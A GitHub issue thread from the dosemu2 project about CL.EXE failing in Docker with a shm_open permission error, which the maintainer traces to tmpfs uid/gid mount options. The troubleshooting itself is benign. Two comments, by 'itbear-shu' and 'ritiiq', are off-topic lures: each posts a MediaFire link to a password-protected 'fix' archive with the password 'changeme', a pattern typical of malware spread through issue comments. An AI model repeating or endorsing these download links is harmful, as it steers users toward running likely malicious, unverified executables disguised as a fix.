### ISSUE TITLE
CL.EXE fails inside Docker with "shm_open(): Permission denied" when /dev/shm mounted as tmpfs

### ISSUE THREAD

**Issue by mkst** [dosemu2/dosemu2#2265]
**Describe the bug**
I am trying to run an old MSVC compiler using dosemu2 within a secure Docker environment, with /dev/shm mounted as tmpfs.

Running CL.EXE outside of Docker is OK:

```
$ dosemu -quiet -dumb -K BIN -E "CL.EXE" 
Microsoft (R) C Optimizing Compiler Version 6.00A   
Copyright (c) Microsoft Corp 1984-1990. All rights reserved.

usage: cl [ option... ] filename... [ -link linkoption... ]
```

However inside of Docker:
```
$ dosemu -dumb -K BIN -E "CL.EXE"
dosemu2 2.0pre9
Get the latest code at http://dosemu2.github.io/dosemu2
Submit Bugs via https://github.com/dosemu2/dosemu2/issues
Ask for help in mail list: linux-msdos@vger.kernel.org
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, GPL v2 (or any later version) distribution conditions.

FDPP kernel 1.7 [GIT: ] (compiled Aug  7 2024)
Kernel compatibility 7.10 - clang - FAT32 support

Written by Stas Sergeev, FDPP project.
Based on FreeDOS sources (C) Pasquale J. Villani and The FreeDOS Project.

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

C: HD1, Pri[ 1], CHS=    0-1-1, start=     0 MB, size=  2000 MB
D: HD2, Pri[ 1], CHS=    0-1-1, start=     0 MB, size=  2000 MB
E: HD3, Pri[ 1], CHS=    0-1-1, start=     0 MB, size=  2000 MB
F: HD4, Pri[ 1], CHS=    0-1-1, start=     0 MB, size=  2000 MB
dosemu XMS 3.0 & UMB support enabled                                           
dosemu EMS driver rev 0.9 installed.
EMUFS host file and print access available
dosemu CDROM driver installed (V0.2)
Process 0 starting: E:\command.com /e:512 /k %FDPP_AUTOEXEC% /M2
ERROR: KVM: error opening /dev/kvm: No such file or directory
ERROR: libao: unable to open output device
ERROR: Unable to open console or check with X to evaluate the keyboard map.
Please specify your keyboard map explicitly via the $_layout option. Defaulting to US.
Can't create debugger pipes, dosdebug not available
ERROR: Screen size is too large: 238x53, max is 160x100, Using 160x53
shm_open(): Permission denied
ERROR: shared memory unavailable, exiting
dosemu2.bin: ./build/../src/dosext/dpmi/msdos/msdos_ldt.c:89: msdos_ldt_init: Assertion `!err' failed.

Aborted (Signal sent by tkill() 1208 999)
```

**To Reproduce**

Save the following as `Dockerfile`

```Dockerfile
FROM ubuntu:jammy

ENV DEBIAN_FRONTEND=noninteractive

RUN apt-get update && apt-get install -y software-properties-common ca-certificates wget


RUN add-apt-repository -y ppa:dosemu2/ppa && \
    add-apt-repository -y ppa:stsp-0/dj64 && \
    apt-get update && \
    apt-get install -y dosemu2 dj64

RUN mkdir /msc600

WORKDIR /msc600

RUN wget https://github.com/decompme/compilers/releases/download/compilers/msc600.tar.gz \
  && tar xvzf msc600.tar.gz \
  && rm msc600.tar.gz

RUN useradd --create-home user

USER user

CMD dosemu -dumb -K BIN -E CL.EXE
```

Build the image:
```
docker build . -t mkst_test
```
Spin up a container:
```sh
docker run \
    --rm -ti \
    --cap-drop=ALL \
    --cap-add=SETUID \
    --cap-add=SETGID \
    --cap-add=SETFCAP \
    --security-opt apparmor=unconfined \
    --security-opt seccomp=unconfined \
    --tmpfs /dev/shm:exec,uid=1000,gid=1000,mode=0700 `# this is what breaks things` \
    mkst_test
```

**Attach program/game binaries or provide an URL**
Compiler can be downloaded from [here](https://github.com/decompme/compilers/releases/download/compilers/msc600.tar.gz).

**Attach the log**
n/a

**A regression?**
Unknown. I've not tried this application before.

**dosemu2 origins**
Installed from `ppa:dosemu2/ppa`

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mkst** [comment]
Hmm, I guess I no longer need to mount `/dev/shm` as `exec` - which I had to do to solve my previous problem, but now it's created this one.

**Comment by stsp** [comment]
I think the problem is that you set uid/gid when mounting tmpfs. It should be available to all users.
Also you seem to say something got fixed, but the error msg is exactly the same as before?
Or do you mean something dosemu-unrelated got fixed?

Понедельник, 26 августа 2024 г получено от Mark Street:

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by stsp** [comment]
OK I see you got comcom64 fixed since last time.
Was reading from mobile.
Anyway, the problem is uid/gid mount options.

**Comment by mkst** [comment]
Even though I am uid 1000? is it because `dosemu2` user is 999?
```
user@f2e767f7d503:/msc600$ grep user /etc/passwd
dosemu2:x:999:999:dosemu2 user:/:/usr/sbin/nologin
user:x:1000:1000::/home/user:/bin/sh
```

**Comment by stsp** [comment]
Exactly.
Why do you even do that?
```
$ mount |grep /dev/shm
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,inode64)
```
It just works.

**Comment by mkst** [comment]
Because `user` is an unprivileged user that we run things under, and I thought we only wanted to give/dev/shm to them, i was unaware of the dosemu2 user until now. I will close this issue as its user error.

**Comment by stsp** [comment]
If you have a separate user already then
you don't need that machinery from dosemu2.
You can then run `dosemu -no-priv-sep`.
I did that just so that people do not have to
run dosemu2 under containers.

**Comment by stsp** [comment]
Actually since new `elfexec` stuff
also uses /dev/shm its better to
get this  fixed.

**Comment by stsp** [comment]
Should be partially fixed now.
The user is now the original but
the group is not yet. So `gid=` will
likely still break things. But I'll
try to address it later.
As for `uid=` - I don't know if it
will work or not: the reading is
done by another user, so if you
don't do `mode=0700` then `uid=`
will probably work... But I can't
check:
```
$ sudo mount -o remount,uid=500 /dev/shm
$ mount | grep /dev/shm
tmpfs on /dev/shm type tmpfs (rw,inode64)
```
Hmm, `uid=` didn't work, it was
not added to mount options. Am
I doing something wrong?
